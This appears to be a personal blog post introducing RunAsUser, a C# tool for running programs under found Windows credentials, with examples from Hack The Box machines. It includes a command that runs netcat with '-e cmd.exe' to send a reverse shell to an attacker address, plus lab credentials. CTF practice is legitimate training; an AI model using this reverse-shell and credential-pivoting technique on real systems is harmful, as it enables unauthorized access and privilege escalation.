So I have been very busy with work lately among everyday life in these crazy times. Anyway this is just a quick post of a tool I created recently called RunAsUser (https://github.com/atthacks/RunAsUser).
What does it do?
During some CTF exercises I have been in a position where I have a low privilege shell on a machine and have found credentials for either another user or admin. Unlike Linux there isn’t a simple “su” switch user command for Windows.
This tool allows you you provide the credentials you found and execute a given program with arguments (optional).
Is there other ways to do this?
Yes there is. You can fairly easily accomplish this in PowerShell but in my experience and the CTF challenges I have used this tool on – I have usually had limited or no PowerShell access for one reason or another. In a cmd shell you can run applications as another user but again I have experienced issues with this in the past and not worked correctly.
On a lot of these machines there may be another way of utilising the credentials to pivot or escalate such as using them with Evil-WinRm. However in the instance that you are out of options, or as an alternative, this tool can help.
Where have you used it?
Most recently I have used it on HTB boxes JSON and ChatterBox.
On the JSON box, once you have a user shell you can obtain the “superadmin” credentials by decompiling a binary. The credentials are superadmin:funnyhtb. Now although there are other ways to root this particular machine, one avenue you can do it is via RunAsUser.
In the JSON instance I uploaded the RunAsUser.exe binary and then executed the following command.
runasuser.exe -u superadmin -p funnyhtb -f c:\Users\Public\nc.exe -a '10.10.14.12 9001 -e cmd.exe'
The above command worked a treat and I got my reverse shell back as superadmin.
In the ChatterBox machine – this demonstrates another way you can use RunAsUser.
As we can see from from the winPEAS output, it found credentials for Alfred. Now some guides online port forward SMB and then use winexe to connect. Others use PowerShell and go through the process of creating a credential object and then using it with Start-Process to execute a command as that other user. This is how I did it:
RunAsUser supports command line arguments (shown in JSON example) and if no arguments are supplied it will walkthrough each step with you allowing you to enter them as seen in the picture above.
How does the tool work?
Its a very simple C# application that takes the arguments you supply and creates a process using those arguments supplied. The tool does the job and in the near future I will likely update it and tidy it up a bit.
This isn’t an every day tool but has certainly made my life easier on quite a few boxes now which is why I made it to be honest.
Anyway I hope this can help someone else. I have more tools and scripts I’ll be releasing soon.
Stay safe everyone 🙂
I have updated the GitHub page (https://github.com/atthacks/RunAsUser) to show an example of where “runas” does not work and “RunAsUser” does work. I created this tool for this exact reason. I was on a machine and had credentials and my initial thought was runas, however this would not work and kept skipping over the password prompt. I am aware there are other solutions to do the same thing, but I enjoyed making this quick tool and thought I would share it as it will hopefully be helpful to someone.